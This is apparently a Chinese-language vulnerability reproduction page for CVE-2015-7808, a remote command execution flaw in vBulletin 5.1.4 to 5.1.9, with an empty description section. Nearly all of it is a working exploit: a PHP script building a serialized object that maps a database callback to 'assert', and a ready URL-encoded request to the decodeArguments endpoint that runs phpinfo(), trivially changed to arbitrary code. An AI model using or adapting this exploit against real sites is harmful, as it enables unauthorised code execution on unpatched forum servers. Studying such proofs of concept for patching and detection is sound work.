跳转至

CVE-2015-7808 VBulletin 远程命令执行漏洞

一、漏洞简介

二、漏洞影响

VBulletin VBulletin 5.1.4 - 5.1.9

三、复现过程

$ php << 'eof'
 <?php
 class vB_Database_MySQL{
        public $functions = array();

        public function __construct() 
        {
                $this->functions['free_result'] = 'assert';
        }
 }

 class vB_dB_Result {
        protected $db;
        protected $recordset;

        public function __construct()
        {
                $this->db = new vB_Database_MySQL();
                $this->recordset = "phpinfo()";
        }
 }

 print urlencode(serialize(new vB_dB_Result())) . "n";
 eof
http://url/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A9%3A%22phpinfo%28%29%22%3B%7D